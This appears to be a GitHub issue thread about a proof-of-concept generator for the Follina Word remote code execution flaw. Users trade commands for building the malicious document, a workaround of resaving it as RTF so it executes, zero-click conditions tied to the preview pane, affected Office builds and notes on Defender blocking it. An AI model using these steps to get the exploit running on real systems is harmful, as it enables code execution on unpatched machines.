OPTIONS method unsupported?

Open steps0x29a opened this issue 2 years ago • 24 comments

First of all: thanks for your work, been a subscriber to your YouTube for quite some time now and highly enjoy it.

This is the reason why I immediately needed to try this one when I saw the repo. Sadly, it doesn't seem to work - at least not for my setup.

I can build the doc just fine and the server starts. When I then open the doc, I do see a lot of requests, but nothing seems to happen beyond that, i.e. the command (I tried several, including calc and notepad) is not executed.

What concerns me is that I get a lot of "unsupported method (OPTIONS)" log messages (see screenshot).

[image]

I am running this from a Windows 10 machine (also tried WSL Kali, same result) and opening the doc on Windows 10 as well.

Thought I'd leave this here in case you want to further improve your tool (or tell me that I did something wrong).

Thanks again. Hoping this will be helpful.

steps0x29a avatar May 31 '22 08:05 steps0x29a

Hi, what Office version do you use?

martinzeifang avatar May 31 '22 13:05 martinzeifang

Hey I got the same error. In my case I tested it in a VM with Word (Version 2205 Build 16.0.15225.20172) 64 Bit.

sevi-kun avatar May 31 '22 14:05 sevi-kun

Sorry, completely forgot to mention the version! Running Version 2205 (Build 15225.20204) 64 Bit

steps0x29a avatar May 31 '22 14:05 steps0x29a

I get the same error with Microsoft 365 Version 2205 (Build 15225.20204) 64 Bit. On Twitter I saw that not all Office 365 versions are vulnerable. I'm installing a test system with an older Office version right now.

martinzeifang avatar May 31 '22 14:05 martinzeifang

Is there a list of what versions are vulnerable/invulnerable?

supertsumu avatar May 31 '22 14:05 supertsumu

I couldn't find one yet. The PoC works with Office 2019 V1808 (Build 10730.20102)

martinzeifang avatar May 31 '22 14:05 martinzeifang

RTF version seems to be working fine on Version 2205 (Build 15225.20204) 64 Bit even though the doc version doesn't. Though I haven't been able to get the 0 click execution to happen.

EDIT: I figured out my problem with the 0 click, the preview pane was disabled. At least on my clean Windows 10 21H2 Enterprise Edition this was the default.

nighttardis avatar May 31 '22 15:05 nighttardis

> RTF version seems to be working fine on Version 2205 (Build 15225.20204) 64 Bit even though the doc version doesn't. Though I haven't been able to get the 0 click execution to happen.

I tried python3 follina.py -c "calc.exe" -o "follina.rtf" -i <myip> but got the exact same result as above. How did you make it work?

steps0x29a avatar May 31 '22 15:05 steps0x29a

> > RTF version seems to be working fine on Version 2205 (Build 15225.20204) 64 Bit even though the doc version doesn't. Though I haven't been able to get the 0 click execution to happen.
>
> I tried python3 follina.py -c "calc.exe" -o "follina.rtf" -i <myip> but got the exact same result as above. How did you make it work?

I had to open the doc that the script generated and save it as an RTF; just changing the file extension didn't work.

nighttardis avatar May 31 '22 15:05 nighttardis

@nighttardis I tried to change the doc to RTF and it didn't work for Word versions 2205 and 2204. Could you detail further how that goes?

davidcbbc avatar May 31 '22 16:05 davidcbbc

@davidcbbc assuming you had opened the doc file with Word and then resaved it as an RTF, then I'm not sure why it would be working for me and not for you, as that is all I did. You don't have any AV stepping in and causing you problems, do you?

nighttardis avatar May 31 '22 16:05 nighttardis

Managed to get rid of the error by adding this method in the client handler class.

def do_OPTIONS(self):
    self.send_response(200, "ok")
    self.send_header('Access-Control-Allow-Origin', '*')
    self.send_header('Access-Control-Allow-Methods', 'GET, OPTIONS')
    self.send_header("Access-Control-Allow-Headers", "X-Requested-With")
    self.send_header("Access-Control-Allow-Headers", "Content-Type")
    self.end_headers()

But this seems to not be the issue since calc still isn't popping up for me

vymvn avatar May 31 '22 16:05 vymvn

I also opened the file in Word and saved it as RTF and it worked. This was on 2205 15225.20204

Cyopeng avatar May 31 '22 16:05 Cyopeng

@nighttardis After changing to .rtf and opening, it gives me the following errors: [image] [image] Did this happen to you?

davidcbbc avatar May 31 '22 16:05 davidcbbc

@davidcbbc What are you attempting with your exploit? Is this a nc shell, calculator, or notepad? I had this error appear but I did not have to click anything as the exploit works regardless.

Cyopeng avatar May 31 '22 17:05 Cyopeng

@Cyopeng Just a calculator for a simple PoC

davidcbbc avatar May 31 '22 17:05 davidcbbc

Edit: I'm replying to @davidcbbc

After manually opening the .doc, saving as .rtf, then opening again, I get the same pop-up (first one you posted). However Windows catches and blocks it (I'm trying to execute calc.exe): [image]

I'm using Office Professional Plus 2019 on Windows 10 Pro (build 19044.1706)

Microsoft® Word 2019 MSO (Version 2205 Build 16.0.15225.20028) 32-bit

nickk avatar May 31 '22 17:05 nickk

When I convert the generated doc to an RTF (open in Word, then save as RTF), it at least triggers Windows Defender.

steps0x29a avatar Jun 01 '22 06:06 steps0x29a

@nickk That was indeed the problem. Defender prevented the execution

davidcbbc avatar Jun 01 '22 10:06 davidcbbc

Things are getting weird over here XD

I just did this: python3 follina.py -o tryagain.docx -i <myip> -c calc.exe and instead of not working at all, Defender caught it this time. Note the .docx file extension instead of .doc - this might be the difference that's making this work - I don't know. Just wanted to let you guys know.

steps0x29a avatar Jun 01 '22 19:06 steps0x29a

> I also opened the file in Word and saved it as RTF and it worked. This was on 2205 15225.20204

+1 worked for me too.

vr-ct avatar Jun 01 '22 23:06 vr-ct

Didn't work for me. Tried all mentioned options. Still getting the "Message unsupported method" error. I'm also getting the "Connecting to the server for information" message during opening of the file, and it gets stuck on this.

drucikpk avatar Jun 02 '22 10:06 drucikpk

@nighttardis After changing to .rtf and opening, it gives me an error message similar to what @davidcbbc posted, but I don't get the chance to click Yes. I was able to verify it was the same message by looking in the Event log.

Microsoft Word This document contains links that may refer to other files. Do you want to update this document with the data from the linked files? P1: 201214 P2: 16.0.15225.20204 P3: P4: 0x80070002

Microsoft Word The last time you opened 'f4.rtf', it caused a serious error. Do you still want to open it? P1: 700164 P2: 16.0.15225.20204

Microsoft Word Word couldn't start last time. Safe mode could help you troubleshoot the problem, but some features might not be available in this mode.

Do you want to start in safe mode? P1: 700159 P2: 16.0.15225.20204 P3: P4:

Microsoft® Word 2016 MSO (Version 2205 Build 16.0.15225.20172) 64-bit

shiftybit avatar Jun 02 '22 14:06 shiftybit

Same issue here:

Open follina.doc > Enable edit > Word closes > Errors below:

- - [29/Jul/2022 15:08:28] code 501, message Unsupported method ('OPTIONS')
- - [29/Jul/2022 15:08:28] "OPTIONS / HTTP/1.1" 501 -
- - [29/Jul/2022 15:08:28] "HEAD /index.html HTTP/1.1" 200 -
- - [29/Jul/2022 15:08:29] code 501, message Unsupported method ('OPTIONS')
- - [29/Jul/2022 15:08:29] "OPTIONS / HTTP/1.1" 501 -

I am running:

Microsoft Word 2016 MSO (16.0.4639.1000) 64 bits
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19042 N/A Build 19042
Hotfix(s): 10 Hotfix(s) Installed.
[01]: KB4601050
[02]: KB4562830
[03]: KB4570334
[04]: KB4577586
[05]: KB4580325
[06]: KB4586864
[07]: KB4589212
[08]: KB4598481
[09]: KB4601319
[10]: KB5005699

oflavioc avatar Jul 29 '22 18:07 oflavioc